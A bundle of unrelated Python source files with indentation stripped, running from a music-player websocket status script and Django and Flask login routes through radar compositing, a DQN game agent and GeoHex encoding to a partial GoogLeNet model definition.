'shuffle': (lambda x: state.update({'shuffle': x['payload']})),
'repeat': (lambda x: state.update({'repeat': x['payload']})),
'time': (lambda x: state.update(x['payload'])),
}
def on_message(ws, message):
obj = json.loads(message)
logger.info('Received new metadata:' + obj['channel'])
clbk = channels.get(obj['channel'], lambda x: logger.error('Unexpected message from GPMDP: ' + x['channel']))
clbk(obj)
write_state()
def on_error(ws, error):
print(error)
def on_close(ws):
logger.info('Socket Closed')
write_output(' Disconnected')
def write_state():
print(state)
play = state['repeat'] == 'SINGLE_REPEAT' and '' or (state['shuffle'] == 'ALL_SHUFFLE' and '' or '')
args = [
state['playState'] and play or '', ' | ',
state['artist'] or 'No artist', ' | ',
state['title'] or 'No music'
]
text = ''.join(args)
write_output(text)
def write_output(text):
logger.info('Writing output')
output = {'text': text,
'class': 'custom-gpmdp',
'alt': 'Google Play Music Daemon'}
sys.stdout.write(json.dumps(output) + '\n')
sys.stdout.flush()
def parse_arguments():
parser = argparse.ArgumentParser()
# Increase verbosity with every occurence of -v
parser.add_argument('-v', '--verbose', action='count', default=0)
# Define for which player we're listening
# parser.add_argument('--player')
return parser.parse_args()
def main():
arguments = parse_arguments()
# Initialize logging
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG,
format='%(name)s %(levelname)s %(message)s')
# Logging is set by default to WARN and higher.
# With every occurrence of -v it's lowered by one
logger.setLevel(max((3 - arguments.verbose) * 10, 0))
# Log the sent command line arguments
logger.debug('Arguments received {}'.format(vars(arguments)))
signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGTERM, signal_handler)
websocket.enableTrace(True)
ws = websocket.WebSocketApp("ws://localhost:5672/",
on_message=on_message,
on_error=on_error,
on_close=on_close)
ws.run_forever()
if __name__ == "__main__":
main()
|
from django.conf.urls import url
from djoser import views
urlpatterns = [
url(r"^token/login/?$", views.TokenCreateView.as_view(), name="login"),
url(r"^token/logout/?$", views.TokenDestroyView.as_view(), name="logout"),
]
|
from ._dummy_data import make_fruit_sold_dummy_association_rules
from ._dummy_data import make_dummy_data_classification
from ._covid_id import make_covid_id
from ._covid_id import get_example_covid_id
__all__ = [
"make_fruit_sold_dummy_association_rules",
"make_dummy_data_classification",
"make_covid_id",
"get_example_covid_id",
]
|
import pytest
def test_classic_notebook_templates(jp_serverapp):
classic_notebook_templates = [
"notebook.html",
"tree.html"
]
# Get the server's template environment.
template_env = jp_serverapp.web_app.settings.get("notebook_jinja2_env")
for name in classic_notebook_templates:
template_env.get_template(name)
async def test_classic_notebook_asset_URLS(jp_fetch):
classic_notebook_paths = [
# Some classic notebook asset paths
'/static/notebook/js/main.js',
'/static/services/contents.js',
# NBclassic asset paths work too.
'/static/notebook/notebook/js/main.js',
'/static/notebook/services/contents.js',
]
for url_path in classic_notebook_paths:
r = await jp_fetch(url_path)
assert r.code == 200
|
from flask import Blueprint, request, jsonify, url_for, redirect
from flask_login import current_user, login_user, logout_user
from project import app, db, google_blueprint
from project.api.forms.forms import LoginForm
from project.models import User, OAuth
from sqlalchemy.orm.exc import NoResultFound
from flask_dance.consumer import oauth_authorized, oauth_error
from flask_dance.consumer.backend.sqla import OAuthConsumerMixin, SQLAlchemyBackend
from flask_dance.contrib.google import make_google_blueprint, google
login_blueprint = Blueprint('login', __name__)
@google_blueprint.route("/google_login/")
def index():
if not current_user.is_authenticated:
return redirect(url_for("google.login"))
resp = google.get("/oauth2/v2/userinfo")
assert resp.ok, resp.text
return "You are {email} on Google".format(email=resp.json()["email"])
@oauth_authorized.connect_via(google_blueprint)
def google_logged_in(blueprint, token):
if not token:
# flash("Failed to log in with Google.", category="error")
return False
resp = blueprint.session.get("/oauth2/v2/userinfo")
if not resp.ok:
msg = "Failed to fetch user info from Google."
# flash(msg, category="error")
return False
google_info = resp.json()
google_user_id = str(google_info["id"])
# Find this OAuth token in the database, or create it
query = OAuth.query.filter_by(
provider=blueprint.name,
provider_user_id=google_user_id,
)
try:
oauth = query.one()
except NoResultFound:
oauth = OAuth(
provider=blueprint.name,
provider_user_id=google_user_id,
token=token,
)
if oauth.user:
login_user(oauth.user)
# flash("Successfully signed in with google.")
else:
# Create a new local user account for this user
user = User(
# Remember that `email` can be None, if the user declines
# to publish their email address on google!
email=google_info["email"],
given_name=google_info["given_name"],
family_name=google_info["family_name"],
picture_url=google_info["picture"],
gender=google_info["gender"],
)
# Associate the new local user account with the OAuth token
oauth.user = user
# Save and commit our database models
db.session.add_all([user, oauth])
db.session.commit()
# Log in the new local user account
login_user(user)
# flash("Successfully signed in with google.")
# Disable Flask-Dance's default behavior for saving the OAuth token
return False
# notify on OAuth provider error
@oauth_error.connect_via(google_blueprint)
def google_error(blueprint, error, error_description=None, error_uri=None):
msg = (
"OAuth error from {name}! "
"error={error} description={description} uri={uri}"
).format(
name=blueprint.name,
error=error,
description=error_description,
uri=error_uri,
)
# flash(msg, category="error")
@login_blueprint.route('/login_standard/', methods=['POST'])
def login():
"""Logs a user in
Args:
login (str): The user's username or email
password (str): The user's non-hashed password
Returns:
200 - {'success': 'User <user_id> logged in'} if successful
400 - {'error_field': ['field error1', 'field error2'...]..., }
Notes:
If the user is logged in, they will be logged out before logging them
in to the requested username or email account.
"""
import time
if current_user.is_authenticated:
logout_user()
form = LoginForm()
if form.validate():
user = User.query.filter_by(email=form.email.data).one()
login_user(user)
response = jsonify({
'success': 'User {} logged in'.format(user.id)
})
response.status_code = 200
return response
response = jsonify(form.errors)
response.status_code = 400
return response
@login_blueprint.route('/logout/')
def logout():
"""Logs a user out """
logout_user()
response = jsonify({
'success': 'You have successfully logged out'
})
response.status_code = 200
return response
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.7 on 2018-02-23 20:24
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('booking', '0004_booked_service_staff'),
]
operations = [
migrations.AlterField(
model_name='booked_service',
name='staff',
field=models.ManyToManyField(related_name='services_assigned', to='customers.Staff'),
),
]
|
#!/usr/bin/env python
# Copyright (c) 2016, wradlib developers.
# Distributed under the MIT License. See LICENSE.txt for more info.
"""
Composition
^^^^^^^^^^^
Combine data from different radar locations on one common set of locations
.. autosummary::
:nosignatures:
:toctree: generated/
extract_circle
togrid
compose_ko
compose_weighted
"""
import numpy as np
# from scipy.spatial import KDTree
# def extract_circle(center, radius, coords):
# """
# Extract the indices of coords which fall within a circle
# defined by center and radius
#
# Parameters
# ----------
# center : float
# radius : float
# coords : array of float with shape (numpoints,2)
#
# Returns
# -------
# output : 1-darray of integers
# index array referring to the coords array
#
# """
# print 'Building tree takes:'
# t0 = dt.datetime.now()
# tree = KDTree(coords)
# print dt.datetime.now() - t0
# print 'Query tree takes:'
# t0 = dt.datetime.now()
# ix = tree.query(center, k=len(coords), distance_upper_bound=radius)[1]
# print dt.datetime.now() - t0
# ix = ix[np.where(ix<len(coords))[0]]
# return ix
def extract_circle(center, radius, coords):
"""
Extract the indices of coords which fall within a circle
defined by center and radius
Parameters
----------
center : float
radius : float
coords : array of float with shape (numpoints,2)
Returns
-------
output : 1-darray of integers
index array referring to the coords array
"""
return np.where(((coords - center) ** 2).sum(axis=-1) < radius ** 2)[0]
def togrid(src, trg, radius, center, data, interpol, *args, **kwargs):
"""
Interpolate data from a radar location to the composite grid or set of
locations
Parameters
----------
src : ndarray of float of shape (numpoints, ndim)
cartesian x / y coordinates of the radar bins
trg : ndarray of float of shape (numpoints, ndim)
cartesian x / y coordinates of the composite
radius : float
the radius of the radar circle (same units as src and trg)
center : array of float
the location coordinates of the radar
data : ndarray of float
the data that should be transferred to composite
interpol : an interpolation class name from :meth:`wradlib.ipol`
e.g. :class:`~wradlib.ipol.Nearest` or :class:`~wradlib.ipol.Idw`
Other Parameters
----------------
*args : arguments of Interpolator (see class documentation)
Keyword Arguments
-----------------
**kwargs : keyword arguments of Interpolator (see class documentation)
Returns
-------
output : ndarray of float
data of the radar circle which is interpolated on the composite grid
Examples
--------
See :ref:`notebooks/basics/wradlib_workflow.ipynb#Gridding`.
"""
# get indices to select the subgrid from the composite grid
ix = extract_circle(center, radius, trg)
# interpolate on subgrid
ip = interpol(src, trg[ix], *args, **kwargs)
data_on_subgrid = ip(data).reshape((len(ix)))
# create container for entire grid
composegridshape = [len(trg)]
composegridshape.extend(data.shape[1:])
compose_grid = np.repeat(np.nan, len(trg) *
np.prod(data.shape[1:])).reshape(composegridshape)
# push subgrid results into the large grid
compose_grid[ix] = data_on_subgrid
return compose_grid
def compose_ko(radargrids, qualitygrids):
"""Composes grids according to quality information using quality \
information as a knockout criterion.
The value of the composed pixel is taken from the radargrid whose
quality grid has the highest value.
Parameters
----------
radargrids : list of arrays
radar data to be composited. Each item in the list corresponds to the
data of one radar location. All items must have the same shape.
qualitygrids : list of arrays
quality data to decide upon which radar site will contribute its pixel
to the composite. Then length of this list must be the same as that
of `radargrids`. All items must have the same shape and be aligned with
the items in `radargrids`.
Returns
-------
composite : array
"""
# first add a fallback array for all pixels having missing values in all
# radargrids
radarfallback = (np.repeat(np.nan, np.prod(radargrids[0].shape))
.reshape(radargrids[0].shape))
radargrids.append(radarfallback)
radarinfo = np.array(radargrids)
# then do the same for the quality grids
qualityfallback = (np.repeat(-np.inf, np.prod(radargrids[0].shape))
.reshape(radargrids[0].shape))
qualitygrids.append(qualityfallback)
qualityinfo = np.array(qualitygrids)
select = np.nanargmax(qualityinfo, axis=0)
composite = (radarinfo.reshape((radarinfo.shape[0], -1))
[select.ravel(), np.arange(np.prod(radarinfo.shape[1:]))]
.reshape(radarinfo.shape[1:]))
radargrids.pop()
qualitygrids.pop()
return composite
def compose_weighted(radargrids, qualitygrids):
"""Composes grids according to quality information using a weighted \
averaging approach.
The value of the composed pixel is the weighted average of all radar
pixels with the quality values being the weights.
Parameters
----------
radargrids : list of arrays
qualitygrids : list of arrays
Returns
-------
composite : array
Examples
--------
See :ref:`notebooks/workflow/recipe1.ipynb`.
See Also
--------
compose_ko : for more description about the shape of the input arrays
"""
radarinfo = np.array(radargrids)
qualityinfo = np.array(qualitygrids)
# overall nanmask
nanmask = np.all(np.isnan(radarinfo), axis=0)
# quality grids must contain values only where radarinfo does
qualityinfo[np.isnan(radarinfo)] = np.nan
qualityinfo /= np.nansum(qualityinfo, axis=0)
composite = np.nansum(radarinfo * qualityinfo, axis=0)
composite[nanmask] = np.nan
return composite
if __name__ == '__main__':
print('wradlib: Calling module <comp> as main...')
|
#!/usr/bin/env python3
"""
Python 3
Try to get all questions from an instrument
"""
import colectica
from colectica import ColecticaObject
import api
import pandas as pd
import os
import numpy as np
import json
def from_instrument_get_question_response(C, Agency, ID):
"""
From an instrument get all questions, all response
"""
df_instrument_set, instrument_info = C.item_info_set(Agency, ID)
df_question = df_instrument_set.loc[(df_instrument_set.ItemType == 'Question') , :]
question_df_list = []
codelist_df_list = []
response_df_list = []
for question_id in df_question['Identifier']:
# print(question_id)
df_question, df_response = C.get_question_all(Agency, question_id)
# store DataFrame in list
question_df_list.append(df_question)
if df_question['response_type'][0] == 'CodeList':
codelist_df_list.append(df_response)
else:
response_df_list.append(df_response)
df_question_all = pd.concat(question_df_list)
if codelist_df_list == []:
df_codelist_all = pd.DataFrame()
else:
df_codelist_all = pd.concat(codelist_df_list)
if response_df_list == []:
df_response_all = pd.DataFrame()
else:
df_response_all = pd.concat(response_df_list)
return instrument_info, df_question_all, df_codelist_all, df_response_all
def from_instrument_get_statement(C, Agency, ID):
"""
From an instrument get all Statement
"""
df_instrument_set, instrument_info = C.item_info_set(Agency, ID)
df_statement = df_instrument_set.loc[(df_instrument_set.ItemType == 'Statement') , :]
statement_df_list = []
for statement_id in df_statement['Identifier']:
dict_statement = C.item_to_dict(Agency, statement_id)
df_statement = pd.DataFrame([dict_statement], columns=dict_statement.keys())
statement_df_list.append(df_statement)
if not statement_df_list == []:
df_statement_all = pd.concat(statement_df_list)
else:
df_statement_all = pd.DataFrame(columns=['AgencyId', 'Version', 'Identifier', 'URN', 'SourceId', 'Instruction', 'Label', 'Literal'])
return df_statement_all
def main():
outdir = 'instrument'
if not os.path.exists(outdir):
os.makedirs(outdir)
hostname = None
username = None
password = None
if not hostname:
hostname = input ("enter the url of the site: ")
if not username:
username = input("enter your username: ")
if not password:
password = input("enter your password: ")
C = ColecticaObject(hostname, username, password)
# get all instruments
# L = C.general_search('f196cc07-9c99-4725-ad55-5b34f479cf7d', '', 0)
# print(L['TotalResults']) # 313
# json.dump(L, open(os.path.join(outdir, 'all_instrument.txt'),'w'))
L = json.load(open(os.path.join(outdir, 'all_instrument.txt')))
# print(L)
all_idx = np.array(range(L['TotalResults']))
# split into 10 chunks
chunks = np.array_split(all_idx, 10)
this_chunk = 9
for i in chunks[this_chunk]:
print(i)
Agency = L['Results'][i]['AgencyId']
ID = L['Results'][i]['Identifier']
Version = L['Results'][i]['Version']
instrument_name = '_'.join(' '.join(L['Results'][i]['ItemName'].values()).split(' '))
instrument_dir = os.path.join(outdir, instrument_name)
if not os.path.exists(instrument_dir):
os.makedirs(instrument_dir)
# From an instrument get all questions, all response, print to file
instrument_info, df_question_all, df_codelist_all, df_response_all = from_instrument_get_question_response(C, Agency, ID)
with open(os.path.join(instrument_dir, 'instrument.txt'), 'w') as f:
print(instrument_info, file=f)
df_question_all.to_csv(os.path.join(instrument_dir, 'question.csv'), index=False, sep='\t')
df_codelist_all.to_csv(os.path.join(instrument_dir, 'codelist.csv'), index=False, sep='\t')
df_response_all.to_csv(os.path.join(instrument_dir, 'response.csv'), index=False, sep='\t')
# From an instrument get all statements
df_statement_all = from_instrument_get_statement(C, Agency, ID)
df_statement_out = df_statement_all.loc[:, ['AgencyId', 'Version', 'Identifier', 'URN', 'SourceId', 'Instruction', 'Label', 'Literal']]
df_statement_out.to_csv(os.path.join(instrument_dir, 'statement.csv'), index=False, sep='\t')
if __name__ == '__main__':
main()
|
import random
import gym
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Flatten, BatchNormalization,Activation
from tensorflow.keras.optimizers import Adam
from scores.score_logger import ScoreLogger
ENV_NAME = "TimePilot-ram-v0"
GAMMA = 0.95
LEARNING_RATE = 0.001
MEMORY_SIZE = 1000000
BATCH_SIZE = 20
EXPLORATION_MAX = 1.0
EXPLORATION_MIN = 0.01
EXPLORATION_DECAY = 0.995
NUM_EPISODES=2
WATCH_TRAINING=False
class DQNSolver:
def __init__(self, observation_input,action_space):
self.exploration_rate = EXPLORATION_MAX
self.observation_input=observation_input
self.action_space = action_space
self.memory = []
self.model = Sequential()
self.model.add(Dense(24, input_shape=observation_input, activation="relu"))
self.model.add(Flatten())
self.model.add(Dense(24, use_bias=False))
self.model.add(BatchNormalization())
self.model.add(Activation("relu"))
self.model.add(Dense(action_space, use_bias=False))
self.model.add(BatchNormalization())
self.model.add(Activation("linear"))
self.model.compile(loss="mse", optimizer=Adam(lr=LEARNING_RATE))
def predict(self,state):
return self.model.predict(state)
def remember(self, state, action, reward, next_state, done):
self.memory.append((state, action, reward, next_state, done))
def act(self, state):
if np.random.rand() < self.exploration_rate:
return random.randrange(self.action_space)
q_values = self.predict(state)[0]
return np.argmax(q_values[0])
def experience_replay(self):
if len(self.memory) < BATCH_SIZE:
return
batch = random.sample(self.memory, BATCH_SIZE)
for state, action, reward, state_next, terminal in batch:
q_update = reward
if not terminal:
#new q value for this state/action pair is equal to the reward gained by taking this action at this state, plus the expected reward to be gained for the rest of the game.
#GAMMA is a parameter relating to the short/long term planning tendencies of the model. High GAMMA means were planning ahead, low means were looking most at short term rewards.
q_update = (reward + GAMMA * np.amax(self.predict(state_next)[0]))
q_values = self.predict(state)
q_values[0][action] = q_update
self.model.fit(state, q_values, verbose=0)
self.exploration_rate *= EXPLORATION_DECAY
self.exploration_rate = max(EXPLORATION_MIN, self.exploration_rate)
def reshape_dims(obs_space):
dims=[1]
for i in range(len(obs_space.shape)):
dims.append(obs_space.shape[i])
return dims
def find_input_shape(env):
input_shape=None
#Box
if(type(env.observation_space)==gym.spaces.box.Box):
input_shape=env.observation_space.shape
#Discrete
elif(type(env.observation_space)==gym.spaces.discrete.Discrete):
input_shape=[env.observation_space.n]
return input_shape
class ActionSpaceError(Exception):
pass
def training():
env = gym.make(ENV_NAME)
# If the user chooses an environment with a non-discrete action space, return an error because DQN only works with discrete action spaces
if(type(env.action_space)!=gym.spaces.discrete.Discrete):
raise ActionSpaceError('This environment uses an action space that is not discrete. DQN can only be trained using discrete action spaces. Please select an envionment with a discrete action space.')
act_space=env.action_space.n
score_logger = ScoreLogger(ENV_NAME)
observation_input=find_input_shape(env)
dims=reshape_dims(env.observation_space)
dqn_solver = DQNSolver(observation_input,act_space)
for i in range(NUM_EPISODES):
state = env.reset()
#reshape state array if it has more than one dimension
if(len(dims)>1):
state = state.reshape(dims)
step = 0
while True:
step += 1
if(WATCH_TRAINING):
env.render()
action = dqn_solver.act(state)
state_next, reward, terminal, info = env.step(action)
reward = reward if not terminal else -reward
#reshape state array if it has more than one dimension
if(len(dims)>1):
state_next = state_next.reshape(dims)
dqn_solver.remember(state, action, reward, state_next, terminal)
state = state_next
if terminal:
print("Run: " + str(i+1) + ", exploration: " + str(dqn_solver.exploration_rate) + ", score: " + str(step))
score_logger.add_score(step, i+1)
break
dqn_solver.experience_replay()
return dqn_solver
def testing(dqn_solver):
env=gym.make(ENV_NAME)
dims=reshape_dims(env.observation_space)
step=0
#set exploration rate to be 0 so that we just follow the q function's policy
dqn_solver.exploration_rate=0
state=env.reset()
#reshape state array if it has more than one dimension
if(len(dims)>1):
state = state.reshape(dims)
while True:
step+=1
env.render()
action=dqn_solver.act(state)
next_state,reward,terminal,info=env.step(action)
if(terminal):
break
#reshape state array if it has more than one dimension
if(len(dims)>1):
state = next_state.reshape(dims)
if __name__ == "__main__":
solution=training()
testing(solution)
|
"""
Added public field to the report table
Revision ID: 1fb575f848af
Revises: 492fe78451c6
Create Date: 2014-02-28 02:14:43.655893
"""
# revision identifiers, used by Alembic.
revision = '1fb575f848af'
down_revision = '492fe78451c6'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('report', sa.Column('public', sa.Boolean(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('report', 'public')
### end Alembic commands ###
|
# coding: utf-8
from .projection import *
import math
__all__ = ["create_zone", "create_zone_by_code", "meter2hex", "hex2deg", "hex2meter", "deg2hex", "encode", "decode", "create_zones_by_extent"]
HEX_KEY = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
WKB_TMPL = "POLYGON(({0} {1}, {2} {3}, {4} {5}, {6} {7}, {8} {9}, {10} {11}, {0} {1}))"
class Zone(object):
"""Hex Zone"""
def __init__(self, level, hex_x_no, hex_y_no):
self._code = encode(level, hex_x_no, hex_y_no)
self._hex_x_no = hex_x_no
self._hex_y_no = hex_y_no
self._level = level
self._x, self._y = hex2meter(self._level, self._hex_x_no, self._hex_y_no)
self._lon, self._lat = meter2deg(self._x, self._y)
@property
def code(self):
return self._code
@property
def hex_x_no(self):
return self._hex_x_no
@property
def hex_y_no(self):
return self._hex_y_no
@property
def level(self):
return self._level
def get_parent(self):
return create_zone_by_code(self._code[:-1])
def get_children(self):
return [create_zone_by_code(self._code + c) for c in "012345678"]
def get_movable_zones(self, distance):
result = []
for delta_y in range(-distance, distance + 1):
minx = -distance + delta_y if delta_y > 0 else -distance
maxx = distance + delta_y if delta_y < 0 else distance
for delta_x in range(minx, maxx + 1):
if delta_x == delta_y == 0: continue
result.append(Zone(self._level, self._hex_x_no + delta_x, self._hex_y_no + delta_y))
return result
def __eq__(self, other):
return other.code == self._code
def __hash__(self):
return hash(self._code)
def get_distance(self, other):
if self._level != other.level:
raise Exception("Level must be same")
delta_x = self._hex_x_no - other.hex_x_no
delta_y = self._hex_y_no - other.hex_y_no
abs_delta_x = abs(delta_x)
abs_delta_y = abs(delta_y)
if delta_x * delta_y > 0:
return abs_delta_x if abs_delta_x > abs_delta_y else abs_delta_y
return abs_delta_x + abs_delta_y
def get_vertices(self):
h_len = HEX_LEN / math.pow(3, self._level)
half_h_len = h_len / 2
h_height = half_h_len * math.sqrt(3)
self._x, self._y = hex2meter(self._level, self._hex_x_no, self._hex_y_no)
h_top = self._y + h_height
h_btm = self._y - h_height
h_l = self._x - h_len
h_r = self._x + h_len
h_cl = self._x - half_h_len
h_cr = self._x + half_h_len
return ((h_l, self._y),
(h_cl, h_top),
(h_cr, h_top),
(h_r, self._y),
(h_cr, h_btm),
(h_cl, h_btm))
def get_vertices_deg(self):
return tuple(meter2deg(m[0], m[1]) for m in self.get_vertices())
def get_wkt(self):
return WKB_TMPL.format(*reduce(lambda a, b: a+b, self.get_vertices()))
def get_wkt_deg(self):
return WKB_TMPL.format(*reduce(lambda a, b: a+b, self.get_vertices_deg()))
def create_zone(level, lon, lat):
return Zone(level, *deg2hex(level, lon, lat))
def create_zone_by_code(hexcode):
return Zone(*decode(hexcode))
def deg2hex(level, lon, lat):
"""degree to hex xy"""
x, y = deg2meter(lon, lat)
return meter2hex(level, x, y)
def meter2hex(level, x, y):
"""meter to hex xy"""
h_len = HEX_LEN / math.pow(3, level)
hy = y - (1 / math.sqrt(3)) * x
hx = y + (1 / math.sqrt(3)) * x
# h_base = 3 * h_len / sqrt(3)
h_base = h_len * math.sqrt(3)
hex_x_coord = hx / h_base
hex_y_coord = hy / h_base
hex_x_coord_org = math.floor(hex_x_coord)
hex_y_coord_org = math.floor(hex_y_coord)
hex_x_no = round(hex_x_coord)
hex_y_no = round(hex_y_coord)
#Y > -X + hex_x_coord_org + hex_y_coord_org + 1
if hex_y_coord >= -hex_x_coord + hex_x_coord_org + hex_y_coord_org + 1:
#Y > 0.5X + hex_y_coord_org - 0.5hex_x_coord_org
#Y < 2X - 2hex_x_coord_org + hex_y_coord_org
if 0.5 * hex_x_coord - 0.5 * hex_x_coord_org + hex_y_coord_org < hex_y_coord \
< 2.0 * hex_x_coord - 2.0 * hex_x_coord_org + hex_y_coord_org:
hex_x_no = hex_x_coord_org + 1
hex_y_no = hex_y_coord_org + 1
#Y < -X + hex_x_coord_org + hex_y_coord_org + 1
elif hex_y_coord < -hex_x_coord + hex_x_coord_org + hex_y_coord_org + 1:
#Y > 2X - 2hex_x_coord_org + hex_y_coord_org - 1
#Y < 0.5X - 0.5hex_x_coord_org + hex_y_coord_org + 0.5
if 2.0 * hex_x_coord - 2.0 * hex_x_coord_org + hex_y_coord_org - 1 < hex_y_coord \
< 0.5 * hex_x_coord - 0.5 * hex_x_coord_org + hex_y_coord_org + 0.5:
hex_x_no = hex_x_coord_org
hex_y_no = hex_y_coord_org
x = (hex_x_no * h_base - hex_y_no * h_base) * (math.sqrt(3) / 2)
if HALF_EL - x < h_len / 2:
tmp_x_no = hex_x_no
hex_x_no = hex_y_no
hex_y_no = tmp_x_no
return int(hex_x_no), int(hex_y_no)
def hex2deg(level, hex_x, hex_y):
"""hex xy to degree"""
return meter2deg(*hex2meter(level, hex_x, hex_y))
def hex2meter(level, hex_x, hex_y):
"""hex xy to meter"""
h_len = HEX_LEN / math.pow(3, level)
y = (hex_x + hex_y) * h_len * math.sqrt(3) / 2.0
x = (hex_x - hex_y) * h_len * 3.0 / 2.0
return x, y
def encode(level, hex_x_no, hex_y_no):
"""encode hex xy to hexcode"""
codes = []
for i in range(-2, level + 1, 1):
base = math.pow(3, level - i)
boundary = math.ceil(base / 2)
code = 0
if hex_x_no <= -boundary:
hex_x_no += base
elif hex_x_no >= boundary:
code += 6
hex_x_no -= base
else:
code += 3
if hex_y_no <= -boundary:
hex_y_no += base
elif hex_y_no >= boundary:
code += 2
hex_y_no -= base
else:
code += 1
codes.append(str(code))
head_code = int("".join(codes[:3]))
quotient = head_code // 30
remainder = head_code % 30
head_code_hex = HEX_KEY[quotient] + HEX_KEY[remainder]
return head_code_hex + "".join(codes[3:])
def decode(code):
"""hexcode to hex xy"""
level = len(code) - 2
quotient = HEX_KEY.index(code[0])
remainder = HEX_KEY.index(code[1])
head_code = "{0:03}".format(quotient * 30 + remainder)
base_code = head_code + code[2:]
hex_x_no = 0
hex_y_no = 0
for i, c in enumerate(base_code):
x = int(c) // 3
y = int(c) % 3
base = math.pow(3, level + 2 - i)
if x == 0:
hex_x_no -= base
elif x == 2:
hex_x_no += base
if y == 0:
hex_y_no -= base
elif y == 2:
hex_y_no += base
return level, int(hex_x_no), int(hex_y_no)
def create_zones_by_extent(level, minx, miny, maxx, maxy):
""" """
ll_zone = create_zone(level, minx, miny)
lr_zone = create_zone(level, maxx, miny)
ul_zone = create_zone(level, minx, maxy)
ur_zone = create_zone(level, maxx, maxy)
#if ll_zone.hex_x_no + ll_zone.hex_y_no > lr_zone.hex_x_no + lr_zone.hex_y_no:
# lr_zone = Zone(level, lr_zone.hex_x_no + 1, lr_zone.hex_y_no)
#elif ll_zone.hex_x_no + ll_zone.hex_y_no < lr_zone.hex_x_no + lr_zone.hex_y_no:
# lr_zone = Zone(level, lr_zone.hex_x_no , lr_zone.hex_y_no -1)
#if ul_zone.hex_x_no + ul_zone.hex_y_no < ur_zone.hex_x_no + ur_zone.hex_y_no:
# ur_zone = Zone(level, ur_zone.hex_x_no + 1, ur_zone.hex_y_no)
#elif ul_zone.hex_x_no + ul_zone.hex_y_no < ur_zone.hex_x_no + ur_zone.hex_y_no:
# ur_zone = Zone(level, ur_zone.hex_x_no , ur_zone.hex_y_no -1)
to_remove = set()
to_remove.add(Zone(level, ll_zone.hex_x_no - 1, ll_zone.hex_y_no))
to_remove.add(Zone(level, lr_zone.hex_x_no, lr_zone.hex_y_no - 1))
to_remove.add(Zone(level, ul_zone.hex_x_no, ul_zone.hex_y_no + 1))
to_remove.add(Zone(level, ur_zone.hex_x_no + 1, ur_zone.hex_y_no))
result = set()
width = lr_zone.get_distance(ll_zone)
height = ul_zone.get_distance(ll_zone)
for i in range(0, width // 2 + 1):
base1 = Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no - i)
#result.append(base1)
for j in range(0, height + 1):
result.add(Zone(level, base1.hex_x_no + j, base1.hex_y_no + j))
if base1.code != lr_zone.code:
##base2 = Zone(level, base1.hex_x_no, base1.hex_y_no -1)
base2 = Zone(level, base1.hex_x_no + 1, base1.hex_y_no)
#result.append(base2)
##for k in range(0, height + 2):
## result.append(Zone(level, base2.hex_x_no + k, base2.hex_y_no + k))
for k in range(0, height ):
result.add(Zone(level, base2.hex_x_no + k, base2.hex_y_no + k))
if ll_zone.get_vertices_deg()[0][1] > miny:
for i in range(0, width // 2 + 1):
result.add(Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no - 1 -i))
if ul_zone.get_vertices_deg()[0][1] < maxy:
for i in range(0, width // 2 + 1):
result.add(Zone(level, ul_zone.hex_x_no + 1 + i, ul_zone.hex_y_no - i))
if ll_zone.get_vertices_deg()[1][0] > minx:
for i in range(0, height):
result.add(Zone(level, ll_zone.hex_x_no + i, ll_zone.hex_y_no + 1 + i))
if lr_zone.get_vertices_deg()[2][0] < maxx:
for i in range(0, height):
result.add(Zone(level, lr_zone.hex_x_no + 1 + i, lr_zone.hex_y_no + i))
return result - to_remove
|
import warnings
from collections import namedtuple
from typing import Optional, Tuple, List, Callable, Any
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
class BasicConv2d(nn.Module):
def __init__(self, in_channels: int, out_channels: int, kernel_size, stride=1, **kwargs: Any) -> None:
super().__init__()
self.conv = nn.Conv2d(in_channels, out_channels, kernel_size, stride, **kwargs)
self.bn = nn.BatchNorm2d(out_channels, eps=0.001)
def forward(self, x: Tensor) -> Tensor:
x = self.conv(x)
x = self.bn(x)
return F.relu(x, inplace=True)
class Inception(nn.Module):
def __init__(
self,
in_channels: int,
ch1x1: int,
ch3x3red: int,
ch3x3: int,
ch5x5red: int,
ch5x5: int,
pool_proj: int,
) -> None:
super().__init__()
self.branch1 = BasicConv2d(in_channels, ch1x1, kernel_size=1)
self.branch2 = nn.Sequential(
BasicConv2d(in_channels, ch3x3red, kernel_size=1),
BasicConv2d(ch3x3red, ch3x3, kernel_size=3, padding=1)
)
self.branch3 = nn.Sequential(
BasicConv2d(in_channels, ch5x5red, kernel_size=1),
BasicConv2d(ch5x5red, ch5x5, kernel_size=3, padding=1),
)
self.branch4 = nn.Sequential(
nn.MaxPool2d(kernel_size=3, stride=1, padding=1, ceil_mode=True),
BasicConv2d(in_channels, pool_proj, kernel_size=1),
)
def forward(self, x: Tensor) -> Tensor:
branch1 = self.branch1(x)
branch2 = self.branch2(x)
branch3 = self.branch3(x)
branch4 = self.branch4(x)
return torch.cat([branch1, branch2, branch3, branch4], 1)
class GoogLeNet(nn.Module):
def __init__(self, num_classes: int = 1000, dropout: float = 0.5, ) -> None:
super().__init__()
self.features = [
BasicConv2d(3, 64, kernel_size=7, stride=2, padding=3), # N x 64 x 112 x 112
nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 64 x 56 x 56
BasicConv2d(64, 64, kernel_size=1), # N x 64 x 56 x 56
BasicConv2d(64, 192, kernel_size=3, padding=1), # N x 192 x 56 x 56
nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 192 x 56 x 56
Inception(192, 64, 96, 128, 16, 32, 32), # N x 256 x 28 x 28
Inception(256, 128, 128, 192, 32, 96, 64), # N x 480 x 28 x 28
nn.MaxPool2d(3, stride=2, ceil_mode=True), # N x 480 x 14 x 14
Inception(480, 192, 96, 208, 16, 48, 64), # N x 512 x 14 x 14
Inception(512, 160, 112, 224, 24, 64, 64), # N x 512 x 14 x 14
Inception(512, 128, 128, 256, 24, 64, 64), # N x 512 x 14 x 14
